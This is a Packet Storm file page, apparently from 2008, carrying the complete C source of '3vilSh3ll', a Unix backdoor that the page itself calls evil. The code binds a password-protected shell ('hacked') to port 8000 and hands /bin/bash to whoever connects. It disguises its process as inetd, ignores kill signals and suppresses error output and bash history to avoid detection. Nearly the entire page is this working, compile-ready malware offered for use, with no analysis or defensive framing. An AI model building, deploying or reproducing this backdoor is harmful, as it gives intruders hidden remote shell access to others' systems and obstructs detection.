exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

3vilSh3ll.c

3vilSh3ll.c
Posted Mar 19, 2008
Authored by Simpp

Classic backdoor bindshell that is password protected, hides activity, forks, and does all the expected functions of an evil backdoor.

tags | tool, rootkit
systems | unix
SHA-256 | 344dd067c46597172bc90327ee89b098c5816e46349abe086be4e827d488c46c

3vilSh3ll.c

Change Mirror Download
/*

------------------------------------
- BACKDOOR BIND CONNECT -
------------------------------------



Author info :

Code : Simpp
Contact : somebody
For : # Bad Digites Team #
Link : http://www.magichack.powa.fr/board
Why : Just for fun



Programm's info :

name :
3vilSh3ll

Compile :
gcc -g -W -Wall -Wextra -o backdoor 3vilSh3ll.c


client :
Netcat


description :
Simple backdoor bind connect .
change the name procecus for hide the command ps .
ignore signal SIGTERM SIGINT SIGQUIT for don't stop the backdoor .
redirect stderr in /dev/null for discret .
create procecus child for execute the evil code .
need passwd for connect backdoor .
redirect bash history (HISTFILE) in /dev/null for the new shell .
redirect stdout , stdin in socket client .

*/


/**** header ****/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>


/**** config ****/

#define HIDE "/usr/sbin/inetd"
#define PORT 8000
#define ACL "\n\tBind Banckdoor by Simpp\n\tFor : # Bad Digites Team #\n\nPasswd : "
#define MAGIC_OK "Passwd accpet connect ...\n"
#define MAGIC_NO "Passwd error connect failed ...\n"
#define MAGIC_KEY "hacked"
#define NULL_LOG "/dev/null"
#define VAR "HISTFILE=/dev/null"
#define CMD "/bin/bash"



/**** structure socket ****/

typedef struct _socket_client_s {
int socket_cli;
struct sockaddr_in from;
socklen_t fromlen;
} socket_client_t;


typedef struct _socket_server_s {
int socket_serv;
struct sockaddr_in addr;
} socket_server_t;



/**** prototype fonction socket server ****/

int socket_server_new(socket_server_t *server);
int socket_server_bind(socket_server_t *server);
int socket_server_listen(socket_server_t *server);
int socket_server_accept_client(socket_server_t *server, socket_client_t *client);
void socket_server_free(socket_server_t *server);



/**** prototype fonction socket client ****/

int socket_client_send(int socket_cli, const char *txt);
int socket_client_recv(int socket_cli, char **buff);
int socket_client_connect_dup2(int socket);
void socket_client_free(socket_client_t *client);



/**** prototype fonction else ;) ****/

void hidden_process(char *argv[]);
void ignore_signal(void);
void clean_log(void);
int redirect_bash_history(void);
int child(void);
void client_fonction(socket_server_t *server);
int check_client(int socket_cli);
int check_passwd(char *pass);



/**** main programm's ****/

int main(int argc, char *argv[])
{
(void) argc;
(void) argv;

pid_t pid;

hidden_process(argv);
clean_log();
ignore_signal();


pid = fork();
if ( pid == -1 ) {
printf("fork() failed\n");
return EXIT_FAILURE;
}

if ( pid )
exit(0);

if ( !pid ) {

if ( child() == -1 )
return EXIT_FAILURE;

}


return EXIT_SUCCESS;
}



/**** fonction socket server ****/

int
socket_server_new(socket_server_t *server)
{
server->socket_serv = socket(AF_INET, SOCK_STREAM, 0);

if ( server->socket_serv == -1 )
return -1;


server->addr.sin_family = AF_INET;
server->addr.sin_port = htons(PORT);
server->addr.sin_addr.s_addr = INADDR_ANY;

return 0;
}


int
socket_server_bind(socket_server_t *server)
{
int ret;

ret = bind(server->socket_serv, (struct sockaddr *)&server->addr, sizeof(server->addr));

if ( ret == -1 )
return -1;

return 0;
}


int
socket_server_listen(socket_server_t *server)
{
int ret;

ret = listen(server->socket_serv, 10000);

if ( ret == -1 )
return -1;

return 0;
}


int
socket_server_accept_client(socket_server_t *server, socket_client_t *client)
{
client->fromlen = sizeof(struct sockaddr);

client->socket_cli = accept(server->socket_serv, (struct sockaddr *)&client->from, &client->fromlen);

if ( client->socket_cli == -1 )
return -1;

return 0;
}


void
socket_server_free(socket_server_t *server)
{
if ( server != NULL ) {

if ( server->socket_serv != -1 )
close(server->socket_serv);

free(server);
server = NULL;
}
}

/*************************************************************/



/**** fonction socket client ****/

int
socket_client_send(int socket_cli, const char *txt)
{
int ret;

ret = write(socket_cli, txt , strlen(txt));

if ( ret == -1 )
return -1;

return 0;
}


int
socket_client_recv(int socket_cli, char **buff)
{
int ret;

memset(*buff, 0, 50);

ret = read(socket_cli, *buff, 50);

if ( ret == -1 )
return -1;

return 0;
}


int
socket_client_connect_dup2(int socket)
{
int ret1, ret2;

close(0);
close(1);
ret1 = dup2(socket, 0);
ret2 = dup2(socket, 1);

if ( ret1 == -1 || ret2 == -1 )
return -1;

return 0;
}


void
socket_client_free(socket_client_t *client)
{
if ( client != NULL ) {

if ( client->socket_cli != -1 )
close(client->socket_cli);

free(client);
client = NULL;
}
}

/*************************************************************/



/**** fonction else ****/

void
hidden_process(char *argv[])
{
strcpy(argv[0], HIDE);
}


void
clean_log(void)
{
int log;

close(2);
close(3);

log = open(NULL_LOG, O_WRONLY);

dup2(log, 2);
dup2(log, 3);

close(log);

}

void
ignore_signal(void)
{
signal(SIGQUIT, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGINT, SIG_IGN);
}


int
redirect_bash_history(void)
{

if ( putenv(VAR) == -1 )
return -1;

return 0;
}


int
child(void)
{
socket_server_t *server = malloc(sizeof(socket_server_t));

if ( server == NULL ) {
printf("malloc *server failed\n");
return -1;
}


if ( socket_server_new(server) == -1 ) {
printf("create new socket server failed\n");
return -1;
}


if ( socket_server_bind(server) == -1 ) {
printf("socket server bind failed\n");
return -1;
}


if ( socket_server_listen(server) == -1 ) {
printf("socket sever listen failed\n");
return -1;
}


if ( redirect_bash_history() == -1 )
printf("redirect HISTFILE on /dev/null failed\n");


while ( 1 ) {

client_fonction(server);

}

socket_server_free(server);
}


void
client_fonction(socket_server_t *server)
{

socket_client_t *client = malloc(sizeof(socket_client_t));

if ( client == NULL )
return;

if ( socket_server_accept_client(server, client) != -1 ) {

if ( check_client(client->socket_cli) != -1 ) {

if ( socket_client_connect_dup2(client->socket_cli) != -1 ) {

system(CMD);

}

}
}


socket_client_free(client);
}


int
check_client(int socket_cli)
{
char *passwd = malloc(50 * sizeof(char));

if ( passwd == NULL )
return -1;


if ( socket_client_send(socket_cli, ACL) == -1 )
return -1;


if ( socket_client_recv(socket_cli, &passwd) == -1 )
return -1;


if ( check_passwd(passwd) == -1 ) {

if ( socket_client_send(socket_cli, MAGIC_NO) == -1 )
return -1;

return -1;
}


else {

if ( socket_client_send(socket_cli, MAGIC_OK) == -1 )
return -1;
}


free(passwd);
passwd = NULL;

return 0;
}


int
check_passwd(char *pass)
{
char *buff = NULL;

buff = strtok(pass, "\n");

if ( !strcmp(MAGIC_KEY, buff) )
return 0;

else
return -1;

}

/*************************************************************/


/*####################### END #######################*/
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close